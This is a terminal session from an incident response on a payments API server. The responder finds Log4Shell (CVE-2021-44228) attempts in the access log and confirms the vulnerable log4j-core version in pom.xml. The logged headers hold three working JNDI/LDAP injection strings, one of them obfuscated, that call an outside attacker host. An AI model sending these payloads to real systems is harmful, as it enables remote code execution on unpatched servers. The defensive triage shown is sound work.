responder@prod-java-trace:/srv/payments-api$ cat access.log | grep 'jndi'
2021-12-10 06:14:31 [WARN] Header: User-Agent:
${jndi:ldap://198.51.100.9:1389/a}
2021-12-10 06:14:44 [WARN] Header: X-Forwarded-For:
${jndi:ldap://198.51.100.9:1389/b}
2021-12-10 06:15:02 [WARN] Header: X-Api-Version:
${${lower:j}ndi:ldap://198.51.100.9:1389/c}
responder@prod-java-trace:/srv/payments-api$ grep -r 'log4j-core' pom.xml
<artifactId>log4j-core</artifactId>
<version>2.14.0</version>
responder@prod-java-trace:/srv/payments-api$ # CVE-2021-44228 — confirmed vulnerable
responder@prod-java-trace:/srv/payments-api$